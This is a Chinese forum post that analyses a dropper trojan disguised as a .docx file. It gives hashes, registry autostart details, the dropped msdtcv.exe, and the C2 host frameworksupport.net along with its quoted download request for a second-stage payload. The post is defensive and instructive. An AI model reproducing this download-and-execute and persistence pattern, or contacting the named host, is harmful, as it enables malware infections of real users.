好久没分析病毒了,今天偶然中发现个病毒,以前也有大佬分析过,在这里我分享一下我的成果。
病毒名称:Update Required Case Enq No 192_2018.docx.com
MD5:8fdc51fa4c14267026810f8b70e61418
SHA1: 5b0899709b4f0c8a076d04ad72e1a87133615f2e
SHA256: 8dd9a89571cbeba93c5839f355e56389d104499f0232f063fba4e40408ca5d4b
环境:Windows 7 32位操作系统
查壳工具:PEID、ExeinfoPE
二进制:010Editor
调试工具:OD、IDApro
1. 查壳
这里我们可以看到Not packed,也就是没有壳。
2. 云沙箱分析
这里我们可以看到它添加了注册表项,实现了自启动;创建了一个文件夹,生成了一个可执行文件,并且创建了一个进程,这些信息都是我们详细分析的时候需要注意的。
我们将文件放入IDA中观察,可以看到下图所示。
从这里整体上来看,他是创建了一个窗口,并且显示/隐藏了它,病毒一般都是隐藏窗口啦,接着我们看第一个函数,也就是sub_401140,如下图所示。
这个一看就很明白,这个就是创建窗口的一些参数嘛!那个sub_4011D0不出意外的话就是窗口回调了,为了证实这一点,让我们进去看看,下图就是sub_4011D0函数的内部
从回调来看,他并没有执行什么恶意操作,让我们回到主函数,继续往下看。
这里也就是隐藏更新窗口的操作,所以我们把重点放在sub_401330这个函数上面,当进去以后我们会发现这个函数不简单,里面有很大一坨…让我们一点一点的分析吧,首先第一个关键点如下图所示
它在C盘创建了一个文件夹,让我们继续往后看,后面的代码静态分析会有点困难,所以在这里我教大家一个好方法,OD和IDA 双剑合并。
打开IDA创建一个map文件
接着打开OD的插件,加载map文件你就会发现一些函数已经被标好了名字如下图所示,这样我们看起来会轻松很多。
接下来,我发现了一个不好的一个现象,这个程序是有随机基址的,如下图所示。
这样会对我们分析造成一点的阻碍,所以这里我去掉了随机基址,熟悉PE文件的都知道,所以这里我修改了下图的位置。
在进入程序的时候我们就可以看到已经没有随机基址了。
下面我们开始IDA和OD配合进行分析,
在这里我们可以看到,它确实是隐藏了窗口。
还有作者的一些花指令
‘
我们可以找到刚才IDA静态分析的地方,让我们继续看下一个函数也就是sub_403B00这个函数,我们通过动态分析看到了下图注册表相关的东西
看到这个注册表我们就应该想到,他应该是有开机自启的功能,让我们继续往下看。
在这里我们可以看到它生成了一个msdtcv.exe放在了自己创建的intel文件夹下。
这里是它是在开机后就开启AppId,到这里sub_403B00我们就分析完毕,至于AppId是什么我们继续往下看
进入sub_401F00我们可以看到下图
在这里我们了解到原来上一个函数的AppId是这里的注册表。
继续往下看,发现这里创建了一个线程,还有启动msdtcv.exe,让我们看看,线程里到底干了些什么
在线程里他创建了一个cmd.exe,并写入了命令,具体可以看下图
我们继续往下看发现了WSAStartup这个函数,我们知道了他是存在网络操作的,对于这个我们已经很熟悉了。
继续往下看sub_402890,在这里我们可以看到它利用网络发送了一些数据
根据以前的经验,我们可以知道inet_addr也就是IP地址,htons就是端口;hostname就是:frameworksupport.net
继续往下看,我们可以看到它发送的请求
文件的内容如下,图片看的可能不太清楚,具体的报文:“GET /ergdfbd/ HTTP/1.1 Host: frameworksupport,net Connection:Close”
保存下载的文件然后执行
由于已经接收不到后续的文件,所以这个病毒到此就分析结束了。
这个病毒其中涉及到一些花指令,一定程度上阻碍了分析的进度,但是这个花指令还可以分析起来不是特别的恶心,后面还有一些加密,也不是特别困难。
分析完了这个病毒后我想到了两种解决方案
1. 关闭80端口(不推荐)
2. 对C盘进行文件夹监控,如果有未授权的文件夹创建就进行提示,是否允许(推荐)
[公告]LV6级以上的看雪会员可以免费获得《2019安全开发者峰会》门票一张!!
最后于 2天前 被一谷米粒编辑 ,原因: